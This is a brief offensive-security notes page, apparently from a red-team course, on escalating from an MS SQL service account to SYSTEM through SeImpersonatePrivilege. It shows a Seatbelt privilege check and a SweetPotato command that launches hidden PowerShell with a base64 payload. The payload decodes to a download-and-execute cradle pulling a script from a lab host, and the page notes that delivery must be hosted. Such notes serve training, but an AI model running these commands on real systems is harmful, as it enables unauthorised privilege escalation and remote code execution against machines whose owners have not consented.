MS SQL Privilege Escalation

Instances often run as NT Service\MSSQLSERVER, which is the default during more modern SQL installations. It has SeImpersonatePrivilege (so, -> potato).

Check privileges

Seatbelt.exe TokenPrivileges

SeImpersonatePrivilege:  SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

Rogue Potato

SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="

Base64 -> iex (new-object net.webclient).downloadstring('http://sql-2.dev.cyberbotic.io:8080/c') Make sure to host scripted web delivery -> /c (tcp-local)

Last updated 2 years ago